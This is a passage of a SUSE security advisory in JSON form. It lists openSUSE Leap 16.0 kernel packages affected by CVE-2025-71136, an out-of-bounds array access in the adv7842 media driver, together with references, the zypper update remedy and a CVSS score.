"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71135"
},
{
"cve": "CVE-2025-71136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status()\n\nIt\u0027s possible for cp_read() and hdmi_read() to return -EIO. Those\nvalues are further used as indexes for accessing arrays.\n\nFix that by checking return values where it\u0027s needed.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71136",
"url": "https://www.suse.com/security/cve/CVE-2025-71136"
},
{
"category": "external",
"summary": "SUSE Bug 1256759 for CVE-2025-71136",
"url": "https://bugzilla.suse.com/1256759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
